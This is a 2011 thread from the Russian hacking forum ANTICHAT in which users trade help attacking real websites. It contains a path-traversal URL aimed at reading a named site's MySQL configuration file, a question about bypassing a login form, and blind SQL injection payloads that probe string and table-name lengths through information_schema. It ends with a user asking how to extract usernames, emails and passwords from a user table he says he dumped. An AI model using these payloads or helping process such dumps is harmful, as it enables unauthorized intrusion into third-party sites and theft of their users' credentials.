HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1605 из 2422 « Первая < 6051105150515551595 1601 1602 1603 1604 1605 1606 1607 1608 1609 1615165517052105 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.02.2011, 21:32
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию
подскажите,

_http://www.kemtipp.ru/news.php?id=152' здесь чтот выжать можно? чет у меня запросы не проходят
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 17.02.2011, 21:42
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию
на тебе,

ht_tp://www.kemtipp.ru/show.php?f=../../../../var/www/default/mysql_data.php
 
Ответить с цитированием

  #3  
Старый 18.02.2011, 00:49
M1lten
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами: 8105366

Репутация: 0
По умолчанию
Можно ли обойти эту авторизацию? Яваскрипт практически не знаю...

И почему value постоянно пустая? И сравнивается с пустой...

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]validate_auth[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]frm[/COLOR][COLOR="#007700"]) { var[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; var[/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"]= new Array(); var[/COLOR][COLOR="#0000BB"]_qfGroups[/COLOR][COLOR="#007700"]= {};[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]frm[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]elements[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]; if ([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'\n - Введите логин'[/COLOR][COLOR="#007700"]; }[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]frm[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]elements[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]; if ([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'\n - Введите пароль'[/COLOR][COLOR="#007700"]; } if ([/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Форма заполнена неправильно:'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]); return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]; } return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]; }[/COLOR][COLOR="#FF8000"]//]]> [/COLOR][/COLOR] 
 
Ответить с цитированием

  #4  
Старый 18.02.2011, 01:10
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
если чтото в яваскрипте то ты его можешь просто отключить, но бегло просмотрев там проверяется только введен ли логин/пасс или нет
 
Ответить с цитированием

  #5  
Старый 18.02.2011, 01:15
M1lten
Познающий
Регистрация: 18.12.2010
Сообщений: 35
С нами: 8105366

Репутация: 0
По умолчанию
Ну да, ведь паса нет. Отключать тоже пробовал, вместо логина паса значение логина и паса становится _qfMsg.

Всеравно, спасибо)
 
Ответить с цитированием

  #6  
Старый 18.02.2011, 08:25
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
как в blind sql injection проверить длину слова т.е. сколько символов содержит?
 
Ответить с цитированием

  #7  
Старый 18.02.2011, 08:34
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Цитата:
Сообщение от noviyuser  
как в blind sql injection проверить длину слова т.е. сколько символов содержит?
1+and+length(@@version)=16

если версия содержит 16 символов вернет true
 
Ответить с цитированием

  #8  
Старый 18.02.2011, 08:45
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от Redwood  
1+and+length(@@version)=16
если версия содержит 16 символов вернет true
спс а как узнать длину таблицы любой?

/**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--

так не работает
 
Ответить с цитированием

  #9  
Старый 18.02.2011, 10:22
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Цитата:
Сообщение от noviyuser  
спс а как узнать длину таблицы любой?
/**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--
так не работает
1+and+(select+length(table_name)+from+information_ schema.tables+limit+0,1)=14
 
Ответить с цитированием

  #10  
Старый 18.02.2011, 18:32
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Слил mysql дамп табдици юзеров, а как можно снеё выдернуть только нужные колонки и сохранит в формате user;mail;pass?
 
Ответить с цитированием
Ответ
Страница 1605 из 2422 « Первая < 6051105150515551595 1601 1602 1603 1604 1605 1606 1607 1608 1609 1615165517052105 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.